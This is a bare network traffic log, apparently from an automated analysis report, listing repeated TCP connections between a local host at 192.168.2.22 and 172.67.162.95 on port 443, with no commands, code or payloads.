      Source: global traffic, TCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global traffic, TCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global traffic, TCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49169
      Source: global traffic, TCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global traffic, TCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global traffic, TCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global traffic, TCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global traffic, TCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49170
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49171
      Source: global traffic, TCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global traffic, TCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global traffic, TCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global traffic, TCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
